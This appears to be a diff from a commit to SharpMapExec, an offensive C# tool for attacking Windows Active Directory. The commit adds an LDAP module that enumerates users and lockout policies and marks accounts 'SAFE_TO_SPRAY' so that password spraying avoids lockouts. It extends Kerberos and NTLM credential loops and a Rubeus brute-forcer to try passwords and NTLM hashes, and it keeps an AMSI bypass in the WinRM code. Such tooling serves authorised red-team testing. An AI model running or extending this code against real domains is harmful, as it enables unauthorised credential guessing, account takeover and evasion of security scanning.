200	+	PasswordHistoryLength = placeHolder;
201	+	break;
202	+
203	+	case "passwordsettingsprecedence":
204	+	PasswordPrecendence = placeHolder;
205	+	break;
206	+
207	+	case "msds-behavior-version":
208	+	PossiblyCustomized = placeHolder >= 3 ? true : false; ;
209	+	break;
210	+	}
211	+	}
212	+	}
213	+	}
214	+	}
215	+
216	+	public class UserInfo
217	+	{
218	+	public virtual string Username { get; set; }
219	+	public virtual Domain.UserState UserState { get; set; }
220	+	}
221	+
222	+	public class LDAPUserInfo : UserInfo
223	+	{
224	+	public override string Username { get; set; }
225	+
226	+	public int BadPasswordCount { get; set; }
227	+	public DateTime BadPasswordTime { get; set; }
228	+	public DateTime LockoutTime { get; set; }
229	+	public int LockoutDuration { get; set; }
230	+	public DateTime PasswordLastSet { get; set; }
231	+	public string PolicyName { get; set; }
232	+
233	+	public LDAPUserInfo(SearchResult result)
234	+	{
235	+	Username = result.Properties["sAMAccountname"][0].ToString().ToLower();
236	+
237	+	int badPwdCount = 0;
238	+	if (result.Properties.Contains("badPwdCount"))
239	+	int.TryParse(result.Properties["badPwdCount"][0].ToString(), out badPwdCount);
240	+	BadPasswordCount = badPwdCount;
241	+
242	+	long badPasswordTime = 0;
243	+	if (result.Properties.Contains("badPasswordTime"))
244	+	long.TryParse(result.Properties["badPasswordTime"][0].ToString(), out badPasswordTime);
245	+
246	+	try
247	+	{
248	+	if (badPasswordTime != -1)
249	+	BadPasswordTime = DateTime.FromFileTime(badPasswordTime);
250	+	}
251	+	catch
252	+	{
253	+	throw new Exception($"Bad password time: {badPasswordTime} for {Username}");
254	+	}
255	+
256	+	long lockoutTime = 0;
257	+	if (result.Properties.Contains("lockoutTime"))
258	+	long.TryParse(result.Properties["lockoutTime"][0].ToString(), out lockoutTime);
259	+
260	+	try
261	+	{
262	+	if (lockoutTime != -1)
263	+	LockoutTime = DateTime.FromFileTime(lockoutTime);
264	+	}
265	+	catch
266	+	{
267	+	throw new Exception($"Bad lockout time: {lockoutTime} for {Username}");
268	+	}
269	+
270	+	int lockoutDuration = 0;
271	+	if (result.Properties.Contains("lockoutDuration"))
272	+	int.TryParse(result.Properties["lockoutDuration"][0].ToString(), out lockoutDuration);
273	+	LockoutDuration = lockoutDuration;
274	+
275	+	long pwdLastSet = 0;
276	+	if (result.Properties.Contains("pwdLastSet"))
277	+	long.TryParse(result.Properties["pwdLastSet"][0].ToString(), out pwdLastSet);
278	+
279	+	try
280	+	{
281	+	if (pwdLastSet != -1)
282	+	PasswordLastSet = DateTime.FromFileTime(pwdLastSet);
283	+	}
284	+	catch
285	+	{
286	+	throw new Exception($"Bad password last set time: {pwdLastSet} for {Username}");
287	+	}
288	+	}
289	+	}
290	+
291	+	public static class LDAPExtensions
292	+	{
293	+	public static LDAPPasswordPolicy GetUserPolicy(this LDAPUserInfo user, List<LDAPPasswordPolicy> Policies)
294	+	{
295	+	var policy = Policies
296	+	.Where(x => x.IsFineGrained && x.AppliesToUsers.Contains(user.Username, StringComparer.OrdinalIgnoreCase))
297	+	.OrderByDescending(y => y.PasswordPrecendence);
298	+
299	+	if (policy.Count() > 0)
300	+	{
301	+	return policy.First();
302	+	}
303	+	else
304	+	{
305	+	return Policies.First(x => !x.IsFineGrained);
306	+	}
307	+	}
308	+
309	+	public static LDAPUserInfo ClassifyUser(this LDAPUserInfo user, LDAPPasswordPolicy policy)
310	+	{
311	+	user.PolicyName = policy.Name;
312	+	if (policy.LockoutThreshold == 0)
313	+	{
314	+	user.UserState = Domain.UserState.SAFE_TO_SPRAY;
315	+	return user;
316	+	}
317	+
318	+	var now = DateTime.Now;
319	+	var start = new DateTime(1900, 01, 01);
320	+	var badPasswordCount = user.BadPasswordCount;
321	+	var lockoutDurationTime = user.LockoutTime.AddTicks((policy.LockoutDuration * -1));
322	+	var observationTime = user.BadPasswordTime.AddTicks((policy.LockoutObservationWindow * -1));
323	+
324	+	if ((badPasswordCount == policy.LockoutThreshold) && (observationTime > now))
325	+	{
326	+	user.UserState = Domain.UserState.LOCKED_OUT;
327	+	}
328	+	else if (badPasswordCount == (policy.LockoutThreshold - 1))
329	+	{
330	+	user.UserState = Domain.UserState.PENDING_LOCK_OUT;
331	+	}
332	+
333	+	if (observationTime < now)
334	+	{
335	+	user.UserState = Domain.UserState.SAFE_TO_SPRAY;
336	+	var diff = (policy.LockoutThreshold - 1);
337	+	}
338	+	else if ((badPasswordCount < (policy.LockoutThreshold - 1)) && (observationTime > now))
339	+	{
340	+	user.UserState = Domain.UserState.SAFE_TO_SPRAY;
341	+	var diff = (policy.LockoutThreshold - 1) - badPasswordCount;
342	+	}
343	+
344	+	if (lockoutDurationTime < start)
345	+	{
346	+	// Never locked out
347	+	}
348	+	if ((lockoutDurationTime > start) && (observationTime < now))
349	+	{
350	+	// Was locked out
351	+	}
352	+	if ((badPasswordCount == (policy.LockoutThreshold - 1)) && (lockoutDurationTime < start) && (observationTime < now))
353	+	{
354	+	// Almost locked out
355	+	}
356	+	if ((badPasswordCount > 0) && (badPasswordCount < (policy.LockoutThreshold - 1)) && (observationTime < now))
357	+	{
358	+	// Prior failed attempts
359	+	}
360	+	return user;
361	+	}
362	+	}
363	+
364	+	public class Domain
365	+	{
366	+	public enum UserState
367	+	{
368	+	LOCKED_OUT = 0,
369	+	PENDING_LOCK_OUT = 1,
370	+	SAFE_TO_SPRAY = 2,
371	+	NOT_YET_KNOWN = 3
372	+	}
373	+
374	+	public static string[] GetList(List<LDAPPasswordPolicy> Policies, List<UserInfo> Users)
375	+	{
376	+	string[] users;
377	+	var excluded = new List<string>();
378	+
379	+	var removedUnsafe = Users.RemoveAll(x => x.UserState != UserState.SAFE_TO_SPRAY);
380	+
381	+	var fineGrainedPoliciesUserCount = Policies
382	+	.Where(x => x.IsFineGrained)
383	+	.Sum(y => y.AppliesToUsers.Count());
384	+
385	+	var defaultPolicyUserCount = Users.Count() - fineGrainedPoliciesUserCount;
386	+
387	+	var removedExcluded = Users.RemoveAll(x => excluded.Contains(x.Username, StringComparer.OrdinalIgnoreCase));
388	+
389	+	Console.WriteLine($"Default Policy: {defaultPolicyUserCount} total user(s)");
390	+	Console.WriteLine($"Fine Grained Policies: {fineGrainedPoliciesUserCount} total user(s)");
391	+	Console.WriteLine($"Removed {removedUnsafe} unsafe user(s)");
392	+	Console.WriteLine($"Removed {removedExcluded} excluded user(s)");
393	+	Console.WriteLine($"Spraying {Users.Count()} user(s)");
394	+	Console.WriteLine($"-----------------------------------");
395	+	Console.WriteLine();
396	+
397	+	users = Users.Select(i => i.Username).ToArray();
398	+
399	+	return users;
400	+	}
401	+
402	+	public static int DisplayPolicyUsers(string policyName, List<LDAPPasswordPolicy> Policies, List<UserInfo> Users, bool onlyCount = false)
403	+	{
404	+	var users = new List<string>();
405	+	var policy = Policies.FirstOrDefault(x => x.Name.ToLower() == policyName.ToLower());
406	+
407	+	if (policy != null)
408	+	{
409	+	if (policy.IsFineGrained)
410	+	{
411	+	users = policy.AppliesToUsers;
412	+	}
413	+	else
414	+	{
415	+	var domUsers = new List<string>();
416	+	Users.ForEach(x => domUsers.Add(x.Username));
417	+
418	+	var fgUsers = new List<string>();
419	+	Policies.Where(x => x.IsFineGrained).ToList()
420	+	.ForEach(p => p.AppliesToUsers.ForEach(x => fgUsers.Add(x)));
421	+
422	+	users = domUsers.Where(p => fgUsers.All(p2 => p2.ToLower() != p.ToLower()))
423	+	.Distinct().ToList();
424	+	}
425	+	}
426	+	else
427	+	{
428	+	Console.WriteLine($"Policy not found: {policyName}");
429	+	}
430	+	return users.Count;
431	+	}
432	+
433	+	public static void DisplayPolicyDetails(LDAPPasswordPolicy policy, List<LDAPPasswordPolicy> Policies, List<UserInfo> Users)
434	+	{
435	+	var count = DisplayPolicyUsers(policy.Name, Policies, Users, true);
436	+
437	+	var lockoutDurationTs = new TimeSpan(policy.LockoutDuration * -1);
438	+	var lockoutObservationWindowTs = new TimeSpan(policy.LockoutObservationWindow * -1);
439	+	var MinimumPasswordAgeTs = new TimeSpan(policy.MinimumPasswordAge * -1);
440	+	var MaximumPasswordAgeTs = new TimeSpan(policy.MaximumPasswordAge * -1);
441	+
442	+	Console.WriteLine($"-----------------------------------");
443	+	Console.WriteLine($"Name: {policy.Name}");
444	+	Console.WriteLine($"Order Precedence: {policy.PasswordPrecendence}");
445	+	Console.WriteLine($"ADs Path: {policy.ADSPath}");
446	+	Console.WriteLine($"Is Fine Grained? {policy.IsFineGrained}");
447	+	if (policy.IsFineGrained) { Console.WriteLine($"Applied to: {policy.AppliesToUsers.Count} users"); }
448	+	Console.WriteLine($"Minimum Password Length: {policy.MinimumPasswordLength}");
449	+	Console.WriteLine($"Lockout Threshold: {policy.LockoutThreshold}");
450	+	Console.WriteLine($"Lockout Duration: {string.Format("{0:%d}d {0:%h}h {0:%m}m {0:%s}s", lockoutDurationTs)}");
451	+	Console.WriteLine($"Lockout Observation Window: {string.Format("{0:%d}d {0:%h}h {0:%m}m {0:%s}s", lockoutObservationWindowTs)}");
452	+	Console.WriteLine($"Minimum / Maximum Password Age: {string.Format("{0:%d}d {0:%h}h {0:%m}m {0:%s}s", MinimumPasswordAgeTs)} / {string.Format("{0:%d}d {0:%h}h {0:%m}m {0:%s}s", MaximumPasswordAgeTs)}");
453	+	Console.WriteLine($"Password History Length: {policy.PasswordHistoryLength}");
454	+	Console.WriteLine($"Applies to: {count} users");
455	+	Console.WriteLine();
456	+	}
457	+
458	+	public static List<string> GetPasswordPolicyUsers(LDAPPasswordPolicy policy, DirectoryEntry directoryObject)
459	+	{
460	+	Console.WriteLine($"[-] Retrieving users for policy: {policy.Name}");
461	+
462	+	var users = new List<string>();
463	+	policy.AppliesToDN.ForEach(a =>
464	+	{
465	+	var groupSearch = new DirectorySearcher(directoryObject);
466	+	groupSearch.Filter = $"(&(objectCategory=user)(memberOf={a}))";
467	+	groupSearch.PageSize = 1000;
468	+	groupSearch.PropertiesToLoad.Add("sAMAccountName");
469	+	groupSearch.SearchScope = SearchScope.Subtree;
470	+
471	+	var groupResults = groupSearch.FindAll();
472	+	if (groupResults.Count > 0)
473	+	{
474	+	for (var i = 0; i < groupResults.Count; i++)
475	+	{
476	+	var username = (string)groupResults[i].Properties["sAMAccountname"][0];
477	+	users.Add(username.ToLower());
478	+	}
479	+	}
480	+	else
481	+	{
482	+	var userSearch = new DirectorySearcher(directoryObject);
483	+	userSearch.Filter = $"(&(objectCategory=user)(distinguishedName={a}))";
484	+	userSearch.PageSize = 1000;
485	+	userSearch.PropertiesToLoad.Add("sAMAccountName");
486	+	userSearch.SearchScope = SearchScope.Subtree;
487	+	var userResults = userSearch.FindOne();
488	+
489	+	if (userResults != null)
490	+	{
491	+	var username = (string)userResults.Properties["sAMAccountname"][0];
492	+	users.Add(username.ToLower());
493	+	}
494	+	}
495	+	});
496	+	return users;
497	+	}
498	+
499	+	static public LDAPPasswordPolicy GetDomainPolicy(DirectoryEntry directoryObject)
500	+	{
501	+	var searcher = new DirectorySearcher(directoryObject);
502	+	searcher.SearchScope = SearchScope.Base;
503	+	searcher.PropertiesToLoad.Add("name");
504	+	searcher.PropertiesToLoad.Add("msds-behavior-version");
505	+	searcher.PropertiesToLoad.Add("lockoutduration");
506	+	searcher.PropertiesToLoad.Add("lockoutthreshold");
507	+	searcher.PropertiesToLoad.Add("lockoutobservationwindow");
508	+	searcher.PropertiesToLoad.Add("minpwdlength");
509	+	searcher.PropertiesToLoad.Add("minpwdage");
510	+	searcher.PropertiesToLoad.Add("maxpwdage");
511	+	searcher.PropertiesToLoad.Add("pwdhistorylength");
512	+	searcher.PropertiesToLoad.Add("adspath");
513	+	searcher.PropertiesToLoad.Add("pwdproperties");
514	+
515	+	var result = searcher.FindOne();
516	+	var policy = new LDAPPasswordPolicy(result, false);
517	+	policy.AppliesToUsers = new List<string>();
518	+
519	+	return policy;
520	+	}
521	+
522	+	public static List<LDAPPasswordPolicy> GetFineGrainedPolicies(DirectoryEntry directoryObject)
523	+	{
524	+	var policies = new List<LDAPPasswordPolicy>();
525	+	var policySearch = new DirectorySearcher(directoryObject);
526	+
527	+	policySearch.Filter = $"(objectclass=msDS-PasswordSettings)";
528	+	policySearch.PropertiesToLoad.Add("name");
529	+	policySearch.PropertiesToLoad.Add("msds-lockoutthreshold");
530	+	policySearch.PropertiesToLoad.Add("msds-psoappliesto");
531	+	policySearch.PropertiesToLoad.Add("msds-minimumpasswordlength");
532	+	policySearch.PropertiesToLoad.Add("msds-passwordhistorylength");
533	+	policySearch.PropertiesToLoad.Add("msds-lockoutobservationwindow");
534	+	policySearch.PropertiesToLoad.Add("msds-lockoutduration");
535	+	policySearch.PropertiesToLoad.Add("msds-minimumpasswordage");
536	+	policySearch.PropertiesToLoad.Add("msds-maximumpasswordage");
537	+	policySearch.PropertiesToLoad.Add("msds-passwordsettingsprecedence");
538	+	policySearch.PropertiesToLoad.Add("msds-passwordcomplexityenabled");
539	+	policySearch.PropertiesToLoad.Add("msds-passwordreversibleencryptionenabled");
540	+
541	+	var pwdPolicies = policySearch.FindAll();
542	+
543	+	foreach (SearchResult result in pwdPolicies)
544	+	{
545	+	var policy = new LDAPPasswordPolicy(result, true);
546	+	policy.AppliesToUsers = GetPasswordPolicyUsers(policy, directoryObject);
547	+	policies.Add(policy);
548	+	}
549	+
550	+	return policies;
551	+	}
552	+
553	+	public static string BindPath(string domain, string domainController, string ou = "")
554	+	{
555	+	string bindPath = String.Format("LDAP://{0}", domainController);
556	+
557	+	if (!String.IsNullOrEmpty(ou))
558	+	{
559	+	string ouPath = ou.Replace("ldap", "LDAP").Replace("LDAP://", "");
560	+	bindPath = String.Format("{0}/{1}", bindPath, ouPath);
561	+	}
562	+	else if (!String.IsNullOrEmpty(domain))
563	+	{
564	+	string domainPath = domain.Replace(".", ",DC=");
565	+	bindPath = String.Format("{0}/DC={1}", bindPath, domainPath);
566	+	}
567	+
568	+	return bindPath;
569	+	}
570	+
571	+	public static string FindDomainController(string domain)
572	+	{
573	+	var pingSender = new Ping();
574	+	var options = new PingOptions();
575	+	options.DontFragment = true;
576	+
577	+	byte[] buffer = Encoding.ASCII.GetBytes(new string('A', 32));
578	+	var reply = pingSender.Send(domain, 120, buffer, options);
579	+	if (reply.Status == IPStatus.Success)
580	+	{
581	+	try
582	+	{
583	+	return Dns.GetHostEntry(reply.Address.ToString()).HostName;
584	+	}
585	+	catch
586	+	{
587	+	return reply.Address.ToString();
588	+	}
589	+	}
590	+	else
591	+	{
592	+	return string.Empty;
593	+	}
594	+	}
595	+
596	+	public static void GetUsers(string domain, string domainController = "", string ou = "")
597	+	{
598	+	if (string.IsNullOrEmpty(domainController))
599	+	domainController = FindDomainController(domain);
600	+	string bindPath = BindPath(domain, domainController);
601	+	//Console.WriteLine(bindPath);
602	+
603	+	DirectoryEntry directoryObject = new DirectoryEntry(bindPath);
604	+	List<LDAPPasswordPolicy> Policies = new List<LDAPPasswordPolicy>();
605	+	List<UserInfo> Users = new List<UserInfo>();
606	+
607	+	DirectorySearcher userSearcher = new DirectorySearcher(directoryObject);
608	+	userSearcher.Filter = "(&(objectCategory=person)(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=2))";
609	+	userSearcher.PropertiesToLoad.Add("sAMAccountName");
610	+	userSearcher.PropertiesToLoad.Add("badPwdCount");
611	+	userSearcher.PropertiesToLoad.Add("badPasswordTime");
612	+	userSearcher.PropertiesToLoad.Add("lockoutTime");
613	+	userSearcher.PropertiesToLoad.Add("lockoutDuration");
614	+	userSearcher.PropertiesToLoad.Add("pwdLastSet");
615	+	userSearcher.SearchScope = SearchScope.Subtree;
616	+
617	+	try
618	+	{
619	+	//pass policy
620	+	Policies.Add(GetDomainPolicy(directoryObject));
621	+
622	+	var fineGrainedPolicies = GetFineGrainedPolicies(directoryObject);
623	+	fineGrainedPolicies.ForEach(x => x.AppliesToUsers = GetPasswordPolicyUsers(x, directoryObject));
624	+	Policies.AddRange(fineGrainedPolicies);
625	+
626	+	//users
627	+	SearchResultCollection users = userSearcher.FindAll();
628	+	foreach (SearchResult user_ in users)
629	+	{
630	+	LDAPPasswordPolicy policy;
631	+	var user = new LDAPUserInfo(user_);
632	+	policy = user.GetUserPolicy(Policies);
633	+	user = user.ClassifyUser(policy);
634	+	Users.Add(user);
635	+	}
636	+
637	+	Console.WriteLine($"[*] {Users.Count} users & {Policies.Count} policies found");
638	+	Console.WriteLine("[*] Saving to users.json and policy.json to loot folder");
639	+	File.WriteAllText(Path.Combine("loot", "users.json"), new JavaScriptSerializer().Serialize(Users));
640	+	File.WriteAllText(Path.Combine("loot", "policy.json"), new JavaScriptSerializer().Serialize(Policies));
641	+	}
642	+	catch (System.Runtime.InteropServices.COMException ex)
643	+	{
644	+	switch ((uint)ex.ErrorCode)
645	+	{
646	+	case 0x8007052E:
647	+	throw new Exception("[-] Login error when retrieving usernames from dc \"" + domainController + "\"! Bad creds?");
648	+	case 0x8007203A:
649	+	throw new Exception("[-] Error connecting with the dc \"" + domainController + "\"! Make sure that provided /domain or /dc are valid");
650	+	case 0x80072032:
651	+	throw new Exception("[-] Invalid syntax in DN specification! Make sure that /ou is correct");
652	+	case 0x80072030:
653	+	throw new Exception("[-] There is no such object on the server! Make sure that /ou is correct");
654	+	default:
655	+	throw ex;
656	+	}
657	+	}
658	+	catch (Exception e)
659	+	{
660	+	throw e;
661	+	}
662	+	}
663	+
664	+	public static void PrintProperties(object myObj, string header = "", int offset = 0)
665	+	{
666	+	string trail = String.Concat(Enumerable.Repeat(" ", offset));
667	+
668	+	if (!string.IsNullOrEmpty(header))
669	+	Console.WriteLine(header);
670	+
671	+	foreach (var prop in myObj.GetType().GetProperties())
672	+	{
673	+	try
674	+	{
675	+	if (!string.IsNullOrEmpty((string)(prop.GetValue(myObj, null))))
676	+	Console.WriteLine(trail + prop.Name + ": " + prop.GetValue(myObj, null));
677	+	}
678	+	catch (Exception e)
679	+	{
680	+	Console.WriteLine(trail + prop.Name + ": " + prop.GetValue(myObj, null));
681	+	}
682	+	}
683	+
684	+	foreach (var field in myObj.GetType().GetFields())
685	+	{
686	+	try
687	+	{
688	+	if (!string.IsNullOrEmpty((string)field.GetValue(myObj)))
689	+	Console.WriteLine(trail + field.Name + ": " + field.GetValue(myObj));
690	+	}
691	+	catch (Exception e)
692	+	{
693	+	Console.WriteLine(trail + field.Name + ": " + field.GetValue(myObj));
694	+	}
695	+	}
696	+	}
697	+	}
698	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/Kerberos.cs

		skipped 20 lines
21	21		{
22	22		AToken.MakeToken("Fake", "Fake", "Fake");
23	23		Console.WriteLine("------------------");
24		-	string ticketoutput;
25	24
26	25		if (String.IsNullOrEmpty(ticket))
27	26		{
	27	+	var secrets = hashes.Length > 0 ? hashes : passwords;
28	28		foreach (string user in users)
29	29		{
30		-	var secrets = hashes.Length > 0 ? hashes : passwords;
31	30		foreach (string secret in secrets)
32	31		{
33	32		string hash;
		skipped 9 lines
43	42		Console.WriteLine(string.Format("[*] User: {0}", user));
44	43		Console.WriteLine(string.Format("[*] Domain: {0}", domain));
45	44		Console.WriteLine(string.Format("[*] Secret: {0}", secret));
46		-	ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
	45	+	string ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
47	46		if (ticketoutput.Contains("[+] Ticket successfully imported!"))
48	47		Console.WriteLine("[+] Ticket successfully imported!");
49	48		else
		skipped 7 lines
57	56		Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
58	57		else if (protocol.ToLower() == "reg32")
59	58		Scan.REG32(computernames, module);
	59	+	else if (protocol.ToLower() == "ldap")
	60	+	Scan.LDAP(module, domain, dc);
60	61		}
61	62		}
62	63		}
63	64		else
64	65		{
65	66		Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
66		-	ticketoutput = SecurityContext.ImportTicket(ticket);
	67	+	string ticketoutput = SecurityContext.ImportTicket(ticket);
67	68		if (ticketoutput.Contains("[+] Ticket successfully imported!"))
68	69		Console.WriteLine("[+] TGT imported successfully!");
69	70		else
		skipped 7 lines
77	78		Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
78	79		else if (protocol.ToLower() == "reg32")
79	80		Scan.REG32(computernames, module);
	81	+	else if (protocol.ToLower() == "ldap")
	82	+	Scan.LDAP(module, domain, dc);
80	83		}
81	84
82	85		AToken.RevertFromToken();
		skipped 3 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/Ntlm.cs

		skipped 9 lines
10	10		{
11	11		public class ntlm
12	12		{
13		-	public static void Ntlm<T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument,string path, string destination, List<string> flags, string protocol)
	13	+	public static void Ntlm(string[] users, string domain, string[] passwords, string[] hashes, string[] computernames, string domainController, string module, string moduleargument,string path, string destination, List<string> flags, string protocol)
14	14		{
15		-	StartJob(users, domain, secrets, computernames, module, moduleargument, path, destination, flags, protocol);
16		-	//var listOfTasks = new List<Task>();
17		-	//listOfTasks.Add(new Task(() => StartJob(users, domain, secrets, computernames, module, moduleargument, path, destination, flags, protocol)));
18		-	//Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
	15	+	//StartJob(users, domain, passwords, hashes, computernames, module, moduleargument, path, destination, flags, protocol);
	16	+	var listOfTasks = new List<Task>();
	17	+	listOfTasks.Add(new Task(() => StartJob(users, domain, passwords, hashes, computernames, domainController, module, moduleargument, path, destination, flags, protocol)));
	18	+	Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
19	19		}
20	20
21		-	public static void StartJob<T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags, string protocol)
	21	+	public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string[] computernames, string domainController, string module, string moduleargument, string path, string destination, List<string> flags, string protocol)
22	22		{
23		-	string[] passwords;
24		-	if (typeof(T) == typeof(NTHash))
	23	+	var secrets = hashes != null ? hashes : passwords;
	24	+
	25	+	if (hashes != null)
25	26		{
26		-	passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Nthash").GetValue(secrets, null);
27	27		foreach (string user in users)
28	28		{
29		-	foreach (string password in passwords)
	29	+	foreach (string password in secrets)
30	30		{
31	31		Console.WriteLine("------------------");
32	32		Console.WriteLine(string.Format("[*] User: {0}", user));
		skipped 13 lines
46	46		{
47	47		Scan.REG32(computernames, module);
48	48		}
	49	+	else if (protocol.ToLower() == "domain")
	50	+	{
	51	+	Scan.LDAP(module, domain, domainController);
	52	+	}
49	53		}
50	54		}
51	55		}
52		-	else if (typeof(T) == typeof(ClearText))
	56	+	else
53	57		{
54		-	passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Cleartext").GetValue(secrets, null);
55	58		foreach (string user in users)
56	59		{
57		-	foreach (string password in passwords)
	60	+	foreach (string password in secrets)
58	61		{
59	62		Console.WriteLine("------------------");
60	63		Console.WriteLine(string.Format("[*] User: {0}", user));
		skipped 22 lines
83	86		else if (protocol.ToLower() == "reg32")
84	87		{
85	88		Scan.REG32(computernames, module);
	89	+	}
	90	+	else if (protocol.ToLower() == "domain")
	91	+	{
	92	+	Scan.LDAP(module, domain, domainController);
86	93		}
87	94		}
88	95		}
		skipped 5 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/Scan.cs

		skipped 20 lines
21	21		Console.WriteLine();
22	22		continue;
23	23		}
24		-	if (!Directory.Exists(Path.Combine("loot", computername)))
25		-	{
26		-	Directory.CreateDirectory(Path.Combine("loot", computername));
27		-	}
28	24		Smb.CheckSMBVersion(computername);
29	25		Smb.CheckOsVersion(computername);
30	26		Smb.CheckLocalAdmin(computername, module);
		skipped 3 lines
34	30		{
35	31		Console.WriteLine("[-] {0}:445 - {1}", computername, e.ToString());
36	32		}
	33	+	}
	34	+	}
	35	+
	36	+	public static void LDAP(string module, string domain, string domainController = "")
	37	+	{
	38	+	try
	39	+	{
	40	+	Console.WriteLine(String.Format("[*] Checking {0}", domain));
	41	+	if (!Misc.CheckHostPort(domain, 389))
	42	+	{
	43	+	Console.WriteLine(String.Format("[-] Could Not Reach {0}:389", domain));
	44	+	Console.WriteLine();
	45	+	return;
	46	+	}
	47	+
	48	+	if (string.IsNullOrEmpty(domainController))
	49	+	domainController = Domain.FindDomainController(domain);
	50	+
	51	+	if (module.Contains("spraydata") \|\| module.Contains("spraylist") \|\| module.Contains("spray"))
	52	+	{
	53	+	Domain.GetUsers(domain, domainController);
	54	+	}
	55	+
	56	+	Console.WriteLine("");
	57	+	}
	58	+	catch (Exception e)
	59	+	{
	60	+	Console.WriteLine("[-] {0}:389 - {1}", domain, e.ToString());
37	61		}
38	62		}
39	63
		skipped 138 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/Wsman.cs

		skipped 87 lines
88	88		connection.SkipRevocationCheck = true;
89	89		connection.SkipCNCheck = true;
90	90		connection.SkipCACheck = true;
	91	+	connection.IdleTimeout = 120 * 1000; //2min timeout
91	92
92	93		if (auth == "kerberos")
93	94		{
		skipped 19 lines
113	114		using (var powershell = PowerShell.Create())
114	115		{
115	116		powershell.Runspace = runspace;
116		-	powershell.AddScript("if(get-module psreadline -all){remove-module psreadline -Force}");
	117	+	powershell.AddScript("if(get-module psreadline){remove-module psreadline -Force}");
117	118		if (AmsiBypass)
118	119		{
119	120		string amsi = AmsiFail.GetPayload();
		skipped 551 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Program.cs

		skipped 5 lines
6	6		{
7	7		internal class Program
8	8		{
	9	+	// TOOD:
	10	+	// computer list
	11	+	// more ldap data
	12	+	// smb null scan
	13	+	// smb file scan
	14	+
9	15		private static void Main(string[] args)
10	16		{
11	17		if (!Directory.Exists("loot"))
		skipped 37 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/Rubeus/lib/Bruteforcer.cs

		skipped 33 lines
34	34		this.validCredentials = new Dictionary<string, string>();
35	35		}
36	36
37		-	public bool Attack(string[] usernames, string[] passwords)
	37	+	public bool Attack(string[] usernames, string[] passwords, string[] hashes)
38	38		{
39	39		bool success = false;
40	40		foreach (string password in passwords)
41	41		{
42	42		foreach (string username in usernames)
43	43		{
44		-	if (this.TestUsernamePassword(username, password))
	44	+	string salt = String.Format("{0}{1}", domain.ToUpper(), username);
	45	+	// special case for computer account salts
	46	+	if (username.EndsWith("$"))
	47	+	{
	48	+	salt = String.Format("{0}host{1}.{2}", domain.ToUpper(), username.TrimEnd('$').ToLower(), domain.ToLower());
	49	+	}
	50	+	//best result with rc4
	51	+	string hash = Crypto.KerberosPasswordHash(Interop.KERB_ETYPE.rc4_hmac, password, salt);
	52	+	if (this.TestUsernamePassword(username, hash, password, Interop.KERB_ETYPE.rc4_hmac))
	53	+	{
	54	+	success = true;
	55	+	}
	56	+	}
	57	+	}
	58	+	foreach (string hash in hashes)
	59	+	{
	60	+	foreach (string username in usernames)
	61	+	{
	62	+	if (this.TestUsernamePassword(username, hash, "", Interop.KERB_ETYPE.rc4_hmac))
45	63		{
46	64		success = true;
47	65		}
48	66		}
49	67		}
50		-
51	68		return success;
52	69		}
53	70
54		-	private bool TestUsernamePassword(string username, string password)
	71	+	private bool TestUsernamePassword(string username, string hash, string password, Interop.KERB_ETYPE encType)
55	72		{
56	73		try
57	74		{
58	75		if (!invalidUsers.ContainsKey(username) && !validCredentials.ContainsKey(username))
59	76		{
60		-	this.GetUsernamePasswordTGT(username, password);
	77	+	this.GetUsernamePasswordTGT(username, hash, password, encType);
61	78		return true;
62	79		}
63	80		}
64	81		catch (KerberosErrorException ex)
65	82		{
66		-	return this.HandleKerberosError(ex, username, password);
	83	+	return this.HandleKerberosError(ex, username, hash);
67	84		}
68	85
69	86		return false;
70	87		}
71	88
72		-	private void GetUsernamePasswordTGT(string username, string password)
	89	+	private void GetUsernamePasswordTGT(string username, string hash, string password, Interop.KERB_ETYPE encType)
73	90		{
74		-	Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
75		-	string salt = String.Format("{0}{1}", domain.ToUpper(), username);
76		-
77		-	// special case for computer account salts
78		-	if (username.EndsWith("$"))
79		-	{
80		-	salt = String.Format("{0}host{1}.{2}", domain.ToUpper(), username.TrimEnd('$').ToLower(), domain.ToLower());
81		-	}
82		-
83		-	string hash = Crypto.KerberosPasswordHash(encType, password, salt);
84		-
85	91		AS_REQ unpwAsReq = AS_REQ.NewASReq(username, domain, hash, encType);
86	92
87	93		byte[] TGT = Ask.InnerTGT(unpwAsReq, encType, null, false, this.dc);
88	94
89		-	this.ReportValidPassword(username, password, TGT);
	95	+	if(!string.IsNullOrEmpty(password))
	96	+	this.ReportValidPassword(username, password, TGT);
	97	+	else
	98	+	this.ReportValidPassword(username, hash, TGT);
90	99		}
91	100
92	101		private bool HandleKerberosError(KerberosErrorException ex, string username, string password)
93	102		{
94		-
95		-
96	103		KRB_ERROR krbError = ex.krbError;
97	104		bool ret = false;
98	105
		skipped 80 lines

■ ■ ■ ■ ■ ■

SharpMapExec/SharpMapExec.csproj

		skipped 60 lines
61	61		<Reference Include="System.ValueTuple, Version=4.0.3.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
62	62		<HintPath>..\packages\System.ValueTuple.4.5.0\lib\netstandard1.0\System.ValueTuple.dll</HintPath>
63	63		</Reference>
	64	+	<Reference Include="System.Web.Extensions" />
64	65		<Reference Include="System.Xml" />
65	66		<Reference Include="System.Xml.Linq" />
66	67		<Reference Include="System.Data.DataSetExtensions" />
		skipped 10 lines
77	78		<Compile Include="Commands\ICommand.cs" />
78	79		<Compile Include="Commands\kerberosSmb.cs" />
